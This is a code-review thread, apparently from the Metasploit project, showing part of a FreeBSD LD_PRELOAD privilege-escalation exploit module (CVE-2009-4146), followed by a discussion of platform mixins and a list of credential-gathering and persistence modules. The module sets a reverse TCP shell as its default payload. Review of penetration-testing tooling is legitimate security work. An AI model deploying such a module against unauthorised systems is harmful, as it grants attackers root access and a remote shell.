modules/exploits/freebsd/local/rtld_execl_priv_esc.rb

```diff
@@ -0,0 +1,215 @@
+
+        This can be abused to load arbitrary shared objects using
+        `LD_PRELOAD`, resulting in privileged code execution.
+
+        This module has been tested successfully on:
+
+        FreeBSD 7.2-RELEASE (amd64); and
+        FreeBSD 8.0-RELEASE (amd64).
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Kingcope', # Independent discovery, public disclosure, and exploit
+          'stealth',  # Discovery and exploit (4b1717926ed0d4823622011625fb1824)
+          'bcoles'    # Metasploit (using Kingcope's exploit code [modified])
+        ],
+      'DisclosureDate' => '2009-11-30',
+      'Platform'       => ['bsd'], # FreeBSD
+      'Arch'           =>
+        [
+          ARCH_X86,
+          ARCH_X64,
+          ARCH_ARMLE,
+          ARCH_AARCH64,
+          ARCH_PPC,
+          ARCH_MIPSLE,
+          ARCH_MIPSBE
+        ],
+      'SessionTypes'   => ['shell'],
+      'References'     =>
+        [
+          ['BID', '37154'],
+          ['CVE', '2009-4146'],
+          ['CVE', '2009-4147'],
+          ['SOUNDTRACK', 'https://www.youtube.com/watch?v=dDnhthI27Fg'],
+          ['URL', 'https://seclists.org/fulldisclosure/2009/Nov/371'],
+          ['URL', 'https://c-skills.blogspot.com/2009/11/always-check-return-value.html'],
+          ['URL', 'https://lists.freebsd.org/pipermail/freebsd-announce/2009-December/001286.html'],
+          ['URL', 'https://xorl.wordpress.com/2009/12/01/freebsd-ld_preload-security-bypass/'],
+          ['URL', 'https://securitytracker.com/id/1023250']
+        ],
+      'Targets'        => [['Automatic', {}]],
+      'DefaultOptions' =>
+        {
+          'PAYLOAD'          => 'bsd/x86/shell_reverse_tcp',
+          'PrependSetresuid' => true,
+          'PrependSetresgid' => true,
+          'PrependFork'      => true,
+          'WfsDelay'         => 10
+        },
+      'DefaultTarget'  => 0))
+    register_options [
+      OptString.new('SUID_EXECUTABLE', [ true, 'Path to a SUID executable', '/sbin/ping' ])
+    ]
+    register_advanced_options [
+      OptBool.new('ForceExploit', [false, 'Override check result', false]),
+      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
+    ]
+  end
+
+  def base_dir
+    datastore['WritableDir'].to_s
+  end
+
+  def suid_exe_path
+    datastore['SUID_EXECUTABLE']
+  end
+
+  def upload(path, data)
+    print_status "Writing '#{path}' (#{data.size} bytes) ..."
+    rm_f path
+    write_file path, data
+    register_file_for_cleanup path
+  end
+
+  def is_root?
+    (cmd_exec('id -u').to_s.gsub(/[^\d]/, '') == '0')
+  end
+
+  def check
+    kernel_release = cmd_exec('uname -r').to_s
+    unless kernel_release =~ /^(7\.[012]|8\.0)/
+      vprint_error "FreeBSD version #{kernel_release} is not vulnerable"
+      return CheckCode::Safe
+    end
+    vprint_good "FreeBSD version #{kernel_release} appears vulnerable"
+
+    unless command_exists? 'gcc'
```

Comment:
Msf::Post::Linux::System#has_gcc? does this

Reply:
It does, but this is a FreeBSD module.

The mixins are a mess, and not something I want to tackle in this PR.

Despite `BSD` and `FreeBSD` being treated as different platforms in `exploit` and `payload` contexts, there are no `BSD` or `FreeBSD` mixins. Instead, the closest match is the `Unix` mixin, which happens to also import `msf/core/post/linux/system`.

Importing a mixin for a different platform for a single method (that's 1 line long) didn't seem appropriate. This pollutes the namespace and is more likely to introduce issues if the Linux mixins change in the future.

Similarly, there's a method for the `is_root?` check in the Linux mixins.

Ideally, the UNIX mixin should be updated to support `is_root?` and `has_gcc?`, and remove the dependency on `msf/core/post/linux/system`. The following modules will also need to be updated. Not something I want to tackle in this PR. I think some of the following are unnecessarily including the `Unix` mixin, and could instead simply import the `Linux` mixin.

```
$ grep -rn Msf::Post::Unix modules/
modules/exploits/linux/local/autostart_persistence.rb:10:  include Msf::Post::Unix
modules/exploits/linux/local/rc_local_persistence.rb:10:  include Msf::Post::Unix
modules/exploits/linux/local/service_persistence.rb:10:  include Msf::Post::Unix
modules/exploits/linux/local/cron_persistence.rb:10:  include Msf::Post::Unix
modules/post/linux/gather/ecryptfs_creds.rb:8:  include Msf::Post::Unix
modules/post/linux/manage/sshkey_persistence.rb:14:  include Msf::Post::Unix
modules/post/linux/manage/pseudo_shell.rb:11:  include Msf::Post::Unix
modules/post/multi/gather/maven_creds.rb:11:  include Msf::Post::Unix
modules/post/multi/gather/lastpass_creds.rb:13:  include Msf::Post::Unix
modules/post/multi/gather/docker_creds.rb:10:  include Msf::Post::Unix
modules/post/multi/gather/rsyncd_creds.rb:8:  include Msf::Post::Unix
modules/post/multi/gather/rubygems_api_key.rb:8:  include Msf::Post::Unix
modules/post/multi/gather/fetchmailrc_creds.rb:8:  include Msf::Post::Unix
modules/post/multi/gather/aws_keys.rb:8:  include Msf::Post::Unix
modules/post/multi/gather/netrc_creds.rb:8:  include Msf::Post::Unix
modules/post/multi/gather/ssh_creds.rb:10:  include Msf::Post::Unix
modules/post/multi/gather/gpg_creds.rb:8:  include Msf::Post::Unix
modules/post/multi/gather/dbvis_enum.rb:12:  include Msf::Post::Unix
modules/post/multi/gather/irssi_creds.rb:8:  include Msf::Post::Unix
modules/post/multi/gather/remmina_creds.rb:8:  include Msf::Post::Unix
modules/post/multi/gather/pgpass_creds.rb:8:  include Msf::Post::Unix
modules/post/multi/manage/dbvis_add_db_admin.rb:10:  include Msf::Post::Unix
modules/post/multi/manage/hsts_eraser.rb:10:  include Msf::Post::Unix
modules/post/multi/manage/dbvis_query.rb:10:  include Msf::Post::Unix
```